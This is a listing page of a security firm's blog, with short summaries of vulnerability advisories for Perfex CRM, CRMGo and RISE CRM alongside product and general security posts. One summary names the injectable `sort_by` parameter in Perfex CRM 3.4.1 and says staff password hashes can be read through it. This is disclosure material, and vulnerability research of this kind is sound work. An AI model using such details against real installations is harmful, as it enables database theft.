Bytium®
Security-first
Insights
Author

Insights by Bytium Operators

LinkedInTwitterGitHubFacebookYouTubeWebsite
All insights
Apr 18, 20265 min read

Blind SQL Injection in Perfex CRM 3.4.1

Perfex CRM 3.4.1 pastes the `sort_by` request parameter directly into an ORDER BY clause with CodeIgniter's identifier escaping disabled. Any staff account — admin flag not required, zero role permissions is enough — can exploit this blind time-based SQL injection to read the entire application database, including the bcrypt-wrapped phpass hashes in `tblstaff.password`.

Apr 18, 20264 min read

Perfex CRM 3.4.1 Cross-Tenant IDOR Vulnerability

Apr 14, 20264 min read

Introducing Bytium Active: Digital Presence Health for Your Business

Bytium Active is a continuous monitoring product that watches the state of your business online — what's exposed, what's expiring, what looks broken, and what you'll need when a customer or insurer asks. Here's why we built it, what it does today, and what's coming next.

product
announcements
security
Jan 10, 20264 min read

Security Isn't a Task. It's a System

Most organizations don’t fail at security because they don’t care. They fail because security is treated as something you do, not something you run.

security
Mar 30, 20252 min read

Stored XSS in Perfex CRM 3.2.1 Contracts Module

Stored XSS in Perfex CRM 3.2.1 project discussions allows authenticated clients to inject JavaScript that runs for other users.

security
advisory
Mar 30, 20252 min read

Stored Cross-Site Scripting in Perfex CRM 3.2.1 Project Discussions

Stored XSS in Perfex CRM 3.2.1 project discussions allows authenticated clients to inject JavaScript that runs for other users.

security
appsec
advisory
Mar 7, 20253 min read

Why 13,000 WordPress Sites Get Hacked Daily and How to Stop It

WordPress isn’t “insecure by default”, but outdated plugins, weak configs, and sloppy access control make it an easy target. Here’s how attacks happen and what to do.

security
Sep 18, 20242 min read

Stored XSS Vulnerabilities in CRMGo SaaS 7.2

Two stored cross-site scripting (XSS) vulnerabilities were identified in CRMGo SaaS version 7.2

advisory
security
vulnerabilities
Sep 12, 20242 min read

Blind SQL Injection in RISE CRM (CVE-2024-8945)

Case study detailing the discovery, validation, and remediation of a blind SQL injection vulnerability in RISE CRM version 3.7.0.

Sep 8, 20242 min read

Fix VMware Workstation Host Modules on Linux Kernel (vmmon/vmnet)

How to patch and rebuild VMware Workstation host modules (vmmon/vmnet) on Debian/Ubuntu/Fedora after a kernel update breaks compilation or networking.

Technical
Page 1 of 2
PreviousNext